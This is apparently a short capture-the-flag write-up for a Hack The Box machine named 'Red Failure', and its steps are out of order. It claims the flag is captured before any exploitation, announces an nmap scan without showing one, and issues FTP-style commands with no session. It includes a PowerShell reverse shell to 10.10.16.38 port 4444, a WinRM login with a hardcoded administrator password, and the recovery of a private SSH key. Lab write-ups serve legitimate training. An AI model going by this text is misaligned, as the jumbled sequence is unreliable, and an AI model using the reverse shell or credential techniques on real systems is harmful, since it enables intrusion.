To start, let's connect to the Hack The Box VPN and access the Red Failure machine. We can use the nmap command to perform an initial scan of the machine:
Get-ChildItem -Path C:\Users\Administrator\Desktop -Filter *flag*
Voilà! We've successfully exploited the Red Failure machine and obtained the flag.
winrm -remote:localhost -user:Administrator -password: P@ssw0rd!
However, we still encounter issues. Let's try to use PowerShell to execute a command:
.\Invoke-PowerShellTcpip.ps1 -Reverse -Ip 10.10.16.38 -Port 4444
get backup.zip
exit
unzip backup.zip
The unzip process reveals a file called id_rsa and a folder called .ssh. The id_rsa file is a private key that we can use for SSH authentication.
With elevated privileges, we can navigate to the Administrator's desktop and retrieve the flag: